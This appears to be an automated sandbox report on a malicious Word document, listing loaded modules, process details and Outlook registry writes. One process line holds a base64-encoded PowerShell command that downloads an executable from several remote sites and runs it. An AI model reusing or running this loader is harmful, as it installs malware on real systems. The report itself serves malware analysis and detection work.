c:\progra~1\micros~1\office14\genko.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\microsoft office\office14\gkword.dll
c:\windows\system32\userenv.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\actxprxy.dll
c:\progra~1\common~1\micros~1\office14\ophproxy.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\msxml3.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\common files\microsoft shared\proof\mslid.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\fm20.dll
c:\windows\system32\comdlg32.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\fm20enu.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\program files\filezilla ftp client\fzshellext.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\netutils.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\windowscodecs.dll

PID: 1016

CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding

Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Indicators: No indicators

Parent process: WINWORD.EXE

User: admin

Integrity Level: LOW

Exit code: 0

Version:

Company: Microsoft Corporation

Description: Microsoft Word

Version: 14.0.6024.1000

Modules

Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\version.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\sxs.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\actxprxy.dll
c:\progra~1\common~1\micros~1\office14\ophproxy.dll
c:\windows\system32\propsys.dll
c:\windows\system32\winspool.drv
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\windowscodecs.dll

PID: 236

CMD: powershell -enco JABVAHAAYQBxAHkAdQB3AGwAdQA9ACcARgBiAHcAZgBkAGQAaABzAGUAdwBxAGYAJwA7ACQARgBiAHMAYwB6AHkAcABvAHIAYwB2AHoAIAA9ACAAJwAyADIANAAnADsAJABNAGkAegB2AG0AbABoAHgAYQBtAGcAaQBvAD0AJwBUAGgAYwBsAHQAeABzAGoAbwB5AG4AZwAnADsAJABCAHgAcgB5AGgAbABiAGYAdgBiAGcAegBtAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABGAGIAcwBjAHoAeQBwAG8AcgBjAHYAegArACcALgBlAHgAZQAnADsAJABFAGoAdQBzAGIAaQBuAGwAegBlAD0AJwBEAHYAcwB4AHUAdABwAGkAYwBqAGQAdQBlACcAOwAkAEYAaAB2AGIAZwBwAHAAcQBqAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcARQBiAGMAbABpAEUAbgBUADsAJABJAG8AdQB3AHQAYwBzAHkAYwBoAGcAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBoAHUAYQBuAGcAeQBpAGYAYQBuAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBkAHUAcABhAGkALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBwAGkAYwBvAGcAcgBhAG0ALgBjAG8ALgBrAHIALwBmAG8ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdABiAGgANQAvACoAaAB0AHQAcAA6AC8ALwB0AGkAZQBuAHAAaABvAG4AZwBtAGEAcgBhAHQAaABvAG4ALgB2AG4ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAAwADIAagBwADIALwAqAGgAdAB0AHAAcwA6AC8ALwBuAGkAcwBhAG4AdABhAHMAaQBjAGEAbgB0AGEAYwBpAHMAaQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaQAzADMAcgB3AC8AKgBoAHQAdABwAHMAOgAvAC8AeQBvAG8AYgBhAHMAZQByAHYAaQBjAGUALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHAAZAByADAALwAnAC4AIgBTAGAAcABMAGkAdAAiACgAJwAqACcAKQA7ACQAWgBsAHcAeQBmAHEAbQB3AGQAbABxAG4APQAnAEkAaAB4AGYAdQB0AHcAcQByACcAOwBmAG8AcgBlAGEAYwBoACgAJABKAGQAdQBxAHcAYwBzAHkAaQAgAGkAbgAgACQASQBvAHUAdwB0AGMAcwB5AGMAaABnACkAewB0AHIAeQB7ACQARgBoAHYAYgBnAHAAcABxAGoALgAiAGQAbwB3AGAATgBsAE8AYQBEAGAARgBpAGAAbABFACIAKAAkAEoAZAB1AHEAdwBjAHMAeQBpACwAIAAkAEIAeAByAHkAaABsAGIAZgB2AGIAZwB6AG0AKQA7ACQAUgBoAGkAdQBnAGEAbgBiAG4AbgB6AGMAPQAnAEkAcgB6AHAAbABlAGcAdAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEIAeAByAHkAaABsAGIAZgB2AGIAZwB6AG0AKQAuACIAbABFAGAATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMAA0ADMAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAFIAdAAiACgAJABCAHgAcgB5AGgAbABiAGYAdgBiAGcAegBtACkAOwAkAEcAcABrAGcAeQBpAHUAdAA9ACcASQBkAGIAdwBrAGMAbABoAHUAaQBmACcAOwBiAHIAZQBhAGsAOwAkAE0AYwB4AGIAZgB6AG8AeABoAD0AJwBaAGwAZAB1AHAAZQBmAGoAYwBtAHoAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABCAGIAdQBtAGcAbAB2AG8AawB4AGQAYgA9ACcAVABwAHEAYgBwAGkAeAB6AHoAcgBzACcA

Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Indicators

Parent process: ––

User: admin

Integrity Level: MEDIUM

Exit code: 0

Version:

Company: Microsoft Corporation

Description: Windows PowerShell

Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\p2pcollab.dll
c:\windows\system32\qagentrt.dll
c:\windows\system32\fveui.dll
c:\windows\system32\netutils.dll

Registry activity

Total events

4166

Read events

2917

Write events

1206

Delete events

Modification events

PID

Process

Operation

Key

Name

Value

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1033

Off

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1041

Off

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1046

Off

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1036

Off

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1031

Off

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1040

Off

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1049

Off

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

3082

Off

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

ProductFiles

1332215988

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources

UISnapshot

1033;1046;1036;1031;1040;1041;1049;3082;1042;1055

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources

UIFallback

1040;0;1033;1046;1036;1031;1041;1049;3082;1042;1055

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources

HelpFallback

0;1033;1046;1036;1031;1040;1041;1049;3082;1042;1055

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1033

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1046

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1036

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1031

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1040

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1041

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1049

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

3082

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1042

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1055

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems

r;c

723B63007C090000010000000000000000000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{0C12CF48-451D-45AC-A927-F5FDBFC07C96}

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{9C3CFE2A-537A-479A-A1E2-85728C400F7D}

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{A8716C2B-35ED-4EE7-A138-FBA0A7C9B5B0}

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{AA3BD3AB-AD94-4243-86C5-8AE3D7D829BC}

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{BC29864C-2254-4A9E-9F4D-721A388618BB}

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\User Settings\Kosmarttag_SmartTag

Count

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook

MTTT

7C09000004A47B683D96D50100000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\SQM

SQMSessionNumber

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\SQM

SQMSessionDate

220294080

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\AutoDiscover\RedirectServers

autodiscover-s.outlook.com

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\0a0d020000000000c000000000000046

00030429

03000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676

{ED475418-B0D6-11D2-8C3B-00104B2A6676}

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676

LastChangeVer

1200000000000000

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109A10090400000000000F01FEC\Usage

OutlookMAPI2Intl_1033

1332215829

2428

OUTLOOK.EXE

write

HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E

LanguageList

en-US

2428

OUTLOOK.EXE

write

HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E

C:\Windows\system32,@tzres.dll,-260

(UTC) Dublin, Edinburgh, Lisbon, London

2428

OUTLOOK.EXE

write

HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E

C:\Windows\system32,@tzres.dll,-262

GMT Standard Time

2428

OUTLOOK.EXE

write

HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E

C:\Windows\system32,@tzres.dll,-261

GMT Daylight Time

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

WORDFiles

1332215870

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

ProductFiles

1332215989

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage

StemmerFiles_1042

1332215809

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems

w`c

776063007C090000040000000000000096000000010000008E000000430043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C0045006D00610069006C002E0064006F0074006D00000000000000

2428

OUTLOOK.EXE

delete key

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\0a0d020000000000c000000000000046

000b046b

0000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676

LastChangeVer

1300000000000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676

LastChangeVer

1400000000000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems

ecc

656363007C090000020000000000000000010000010000008C0000006800000063003A005C00700072006F006700720061006D002000660069006C00650073005C006D006900630072006F0073006F006600740020006F00660066006900630065005C006F0066006600690063006500310034005C0061006400640069006E0073005C0063006F006C006C006500610067007500650069006D0070006F00720074002E0064006C006C0000006D006900630072006F0073006F006600740020007300680061007200650070006F0069006E0074002000730065007200760065007200200063006F006C006C0065006100670075006500200069006D0070006F007200740020006100640064002D0069006E000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems

$cc

246363007C0900000200000000000000C000000001000000700000004400000063003A005C00700072006F006700720061006D002000660069006C00650073005C006D006900630072006F0073006F006600740020006F00660066006900630065005C006F0066006600690063006500310034005C006F006E006200740074006E006F006C002E0064006C006C0000006F006E0065006E006F007400650020006E006F007400650073002000610062006F007500740020006F00750074006C006F006F006B0020006900740065006D0073000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems

#cc

236363007C0900000200000000000000D0000000010000007E0000004600000063003A005C00700072006F006700720061006D002000660069006C00650073005C006D006900630072006F0073006F006600740020006F00660066006900630065005C006F0066006600690063006500310034005C0073006F006300690061006C0063006F006E006E006500630074006F0072002E0064006C006C0000006D006900630072006F0073006F006600740020006F00750074006C006F006F006B00200073006F006300690061006C00200063006F006E006E006500630074006F0072000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems

0dc

306463007C0900000200000000000000CA000000010000008A0000003400000063003A005C00700072006F006700720061006D002000660069006C00650073005C006D006900630072006F0073006F006600740020006F00660066006900630065005C006F0066006600690063006500310034005C0061006400640069006E0073005C0075006D006F00750074006C006F006F006B0061006400640069006E002E0064006C006C0000006D006900630072006F0073006F00660074002000650078006300680061006E006700650020006100640064002D0069006E000000

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

OUTLOOKFiles

1332215854

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109A10090400000000000F01FEC\Usage

OUTLOOKFilesIntl_1033

1332215831

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems

=dc

3D6463007C0900000200000000000000C000000001000000700000004400000063003A005C00700072006F006700720061006D002000660069006C00650073005C006D006900630072006F0073006F006600740020006F00660066006900630065005C006F0066006600690063006500310034005C006F006E006200740074006E006F006C002E0064006C006C0000006F006E0065006E006F007400650020006E006F007400650073002000610062006F007500740020006F00750074006C006F006F006B0020006900740065006D0073000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems

-dc

2D6463007C0900000200000000000000D0000000010000007E0000004600000063003A005C00700072006F006700720061006D002000660069006C00650073005C006D006900630072006F0073006F006600740020006F00660066006900630065005C006F0066006600690063006500310034005C0073006F006300690061006C0063006F006E006E006500630074006F0072002E0064006C006C0000006D006900630072006F0073006F006600740020006F00750074006C006F006F006B00200073006F006300690061006C00200063006F006E006E006500630074006F0072000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems

-dc

2D6463007C0900000200000000000000CA000000010000008A0000003400000063003A005C00700072006F006700720061006D002000660069006C00650073005C006D006900630072006F0073006F006600740020006F00660066006900630065005C006F0066006600690063006500310034005C0061006400640069006E0073005C0075006D006F00750074006C006F006F006B0061006400640069006E002E0064006C006C0000006D006900630072006F0073006F00660074002000650078006300680061006E006700650020006100640064002D0069006E000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\SocialConnector

CleanupFolder

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\{81EDCD2E-E848-4DA6-A8C2-7D26B3B1C712}

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\SocialConnector

AlertTypes

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\SocialConnector

RestartsSinceAlerts

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\SocialConnector

AlertInsertStrings

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\SocialConnector

PeoplePaneModeInspector

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings

ProxyEnable

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

SavedLegacySettings

